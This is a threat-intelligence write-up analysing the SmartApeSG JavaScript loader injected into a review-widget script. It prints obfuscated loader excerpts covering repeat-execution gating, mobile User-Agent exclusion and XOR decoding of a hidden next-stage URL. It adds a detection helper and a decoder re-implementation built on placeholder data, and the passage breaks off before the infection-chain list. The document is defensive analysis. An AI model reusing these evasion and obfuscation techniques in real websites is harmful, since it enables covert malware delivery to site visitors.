SmartApeSG (also tracked as ZPHP or HANEYMANEY) has been associated with prior campaigns that led to the deployment of malware families such as NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.
In this incident, the injected SmartApeSG JavaScript behaved as a staged loader and did not attempt to execute every action immediately. Instead, the JavaScript focused on control, reconstruction, and retrieval, which reduced the visibility of the script and gave the operator more flexibility. A portion of the malicious JS is shown in the figure below:

Figure 1: Malicious SmartApeSG JavaScript code injected into the Okendo Reviews script.
At a high level, the SmartApeSG loader workflow includes the stages shown in the figure below:

Figure 2: SmartApeSG loader workflow overview.
To suppress repeated execution, the script implements browser-side state tracking using localStorage. On first execution, the code writes a timestamp marker. Subsequent visits can be short-circuited based on that stored value, which reduces noisy repeat behavior and lowers the chance of casual observation during testing.
The script also applies User-Agent filtering. In the samples we analyzed, the checks biased execution toward desktop environments and excluded mobile devices. This is consistent with later-stage ClickFix workflows, which are typically optimized for desktop interaction patterns and follow-on tooling.
The following example shows the script using localStorage to track prior execution and the User-Agent check for mobile browsers.
    function _0x32dfc8() {
        const _0x26256c = _0xd28549; // obfuscator's string-table lookup helper, defined elsewhere in the script
        const _0x490d08 = localStorage['getItem'](_0x4a5293); // _0x4a5293 holds the marker's key name
        if (!_0x490d08) {
            // no marker yet (first execution): write the current timestamp as the marker
            // _0x26256c(0xde) resolves to a method name such as 'toString' via the string table
            localStorage['setItem'](_0x4a5293, Date['now']()[_0x26256c(0xde)]());
            return ![]; // ![] evaluates to false
        }
        // with a marker present, the remainder of the function (not captured) decides whether to short-circuit
    }
    function _0x4e7869() {
        // true for Android/iPhone user agents, which the loader excludes
        return /Android|iPhone/i['test'](navigator['userAgent']);
    }

After the environment checks are complete, the loader reconstructs the next-stage delivery path. The infrastructure is not stored in cleartext. Instead, the destination is split into encoded fragments designed to complicate static inspection and evade basic signature approaches.
During execution, the script applies an XOR-based decoding routine to rebuild the hidden path. It also generates a randomized 8-character token and dynamically inserts a new <script> element into the page to retrieve follow-on content.
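The environment gate and the fragment-reconstruction and script-insertion steps described above leave recognisable static hallmarks in the injected code. The following is an added triage helper written for this write-up; it is not code from the page or from the SmartApeSG sample. It runs a small set of patterns over a script body and reports which hallmarks co-occur, accepting both dot and bracket property access because the obfuscated sample uses the bracket form. The createElement('script') pattern is an assumption about how the dynamic script insertion appears (the page shows no such line), and both inputs it is run on are constructed.

```javascript
// Added triage helper (not the SmartApeSG sample's code). Patterns are tuned to the
// forms seen in the obfuscated loader: localStorage['setItem'], Date['now'](),
// /Android|iPhone/i, arrays of 8-hex-char fragments and parseInt(x['substr'](i, 0x2), 0x10).
const INDICATORS = [
  { name: 'localStorage marker write',      re: /localStorage(?:\.setItem|\['setItem'\])/ },
  { name: 'timestamp via Date.now',         re: /Date(?:\.now|\['now'\])\(\)/ },
  { name: 'mobile UA filter',               re: /\/Android\|iPhone\/i/ },
  { name: 'array of 8-hex-char fragments',  re: /(?:'[0-9a-f]{8}'\s*,\s*){3,}/ },
  { name: 'hex-pair XOR decode loop',       re: /parseInt\(\s*\w+(?:\.substr|\['substr'\])\(\s*\w+\s*,\s*(?:2|0x2)\s*\)\s*,\s*(?:16|0x10)\s*\)/ },
  // Assumption: dynamic <script> insertion shows up as createElement('script') in some form.
  { name: 'dynamic script element',         re: /createElement(?:\(|'\]\()\s*['"]script['"]/ },
];

// Returns the names of the hallmarks present and a coarse verdict. A lone localStorage
// write or Date.now() call is common in benign analytics/consent code, so a script is
// only called suspicious when three or more hallmarks co-occur.
function scanForLoaderHallmarks(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.name);
  return { hits, suspicious: hits.length >= 3 };
}

// Constructed input mimicking the injected loader's shape (not the real script; the
// hex fragments are the literals quoted from the sample in this write-up).
const CONSTRUCTED_LOADER = [
  "function gate(){const m=localStorage['getItem']('k');if(!m){localStorage['setItem']('k',Date['now']()['toString']());return ![];}}",
  "function isMobile(){return /Android|iPhone/i['test'](navigator['userAgent']);}",
  "const parts=['1f044640', '044a1d1f', '16005b1e', '0019484a'];",
  "const b=parseInt(p['substr'](i, 0x2), 0x10);",
  "const s=document['createElement']('script');document['head']['appendChild'](s);",
].join('\n');

// Constructed benign input: a consent banner that also stores a timestamp in localStorage.
const CONSTRUCTED_BENIGN =
  "if(!localStorage.getItem('consent')){localStorage.setItem('consent', Date.now().toString());}";

if (typeof require !== 'undefined' && require.main === module) {
  console.log('loader-like:', scanForLoaderHallmarks(CONSTRUCTED_LOADER));
  console.log('benign     :', scanForLoaderHallmarks(CONSTRUCTED_BENIGN));
}
```

Run it with node against a captured script body (for example, the Okendo Reviews script as served to the browser) and compare the hit list against a known-good copy of the same file; the verdict threshold is a starting point for triage, not a signature.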
The following example shows the loader decoding XOR-obfuscated string fragments to reconstruct the hidden next-stage URL.
    function __getHiddenURL() {
        const _0x59daee = _0x3b1d; // obfuscator's string-table lookup helper
        const _0x4e7e48 = _0x59daee(0xd9); // XOR key string, pulled from the string table (not shown here)
        // hex-encoded fragments of the hidden URL; some entries are themselves string-table lookups
        const _0x5c29df = ['1f044640', '044a1d1f', '16005b1e', '0019484a', _0x59daee(0xe4), _0x59daee(0xe6), '141f5f1f', '141c5359', '1a031d43', '141f4255', _0x59daee(0xd4), '121d531e', '0718420f'];
        let _0x5c798a = '';
        for (let _0xb3288f = 0x0; _0xb3288f < _0x5c29df['length']; _0xb3288f++) {
            let _0x5d86c7 = _0x5c29df[_0xb3288f];
            let _0x22ea90 = '';
            // two hex digits at a time; the key index restarts at 0 for every fragment
            for (let _0x3ba209 = 0x0; _0x3ba209 < _0x5d86c7['length']; _0x3ba209 += 0x2) {
                const _0x9daa62 = parseInt(_0x5d86c7['substr'](_0x3ba209, 0x2), 0x10);
                // _0x59daee(0xe0) resolves to 'charCodeAt' via the string table
                _0x22ea90 += String['fromCharCode'](_0x9daa62 ^ _0x4e7e48[_0x59daee(0xe0)](_0x3ba209 / 0x2 % _0x4e7e48['length']));
            }
            _0x5c798a += _0x22ea90;
        }
        return _0x5c798a;
    }

The structure and execution model we observed align with previously documented SmartApeSG campaigns.
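For an analyst who has pulled the key (the string the sample fetches via _0x59daee(0xd9), which is not reproduced on this page) and the fragment array out of a captured script, the following is an added, readable re-implementation of the routine above. It is not the sample's code: the key, the placeholder URL and the fragments it produces are constructed for the demonstration, and the encoder exists only to build that test data. It preserves the detail that matters when reusing the scheme on other samples: the key index restarts at zero for every fragment rather than running across the whole string.

```javascript
// Added example (not from the SmartApeSG sample): a cleaned-up version of the loader's
// fragment decoder. Key and fragments below are CONSTRUCTED placeholders.

// Decode one hex fragment: byte i of the fragment is XORed with key.charCodeAt(i % key.length).
// The key offset is relative to the fragment, not the whole URL, exactly as in the sample;
// decoding with a global key offset yields garbage from the second fragment onward.
function decodeFragment(fragmentHex, key) {
  if (fragmentHex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(fragmentHex)) {
    throw new Error(`malformed fragment: ${fragmentHex}`);
  }
  let out = '';
  for (let i = 0; i < fragmentHex.length; i += 2) {
    const byte = parseInt(fragmentHex.slice(i, i + 2), 16);
    out += String.fromCharCode(byte ^ key.charCodeAt((i / 2) % key.length));
  }
  return out;
}

// Decode the whole fragment array and concatenate, as __getHiddenURL does.
function decodeFragments(fragments, key) {
  return fragments.map((f) => decodeFragment(f, key)).join('');
}

// Inverse of the scheme, used here only to build constructed test data (the loader ships
// pre-encoded fragments). Splits the plaintext into 4-byte chunks like the sample's
// 8-hex-character entries.
function encodeFragments(plaintext, key, chunkLen = 4) {
  const fragments = [];
  for (let start = 0; start < plaintext.length; start += chunkLen) {
    const chunk = plaintext.slice(start, start + chunkLen);
    let hex = '';
    for (let i = 0; i < chunk.length; i++) {
      const byte = chunk.charCodeAt(i) ^ key.charCodeAt(i % key.length);
      hex += byte.toString(16).padStart(2, '0');
    }
    fragments.push(hex);
  }
  return fragments;
}

// Constructed demo data: placeholder key and placeholder next-stage URL (not real infrastructure).
const DEMO_KEY = 'k3yPl4c3';
const DEMO_URL = 'https://stage2.example.invalid/loader.js';
const DEMO_FRAGMENTS = encodeFragments(DEMO_URL, DEMO_KEY);

// Round-trip: decoding the constructed fragments must give back DEMO_URL.
function demo() {
  return decodeFragments(DEMO_FRAGMENTS, DEMO_KEY);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('fragments:', DEMO_FRAGMENTS);
  console.log('decoded  :', demo());
}
```

To apply it to a real capture, replace DEMO_KEY with the string the sample's string-table lookup returns for index 0xd9 and DEMO_FRAGMENTS with the resolved array (the _0x59daee(...) entries must be resolved to their hex strings first); the malformed-fragment check then catches any entry that was left unresolved.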
The SmartApeSG infection chain will typically go on to perform the following actions: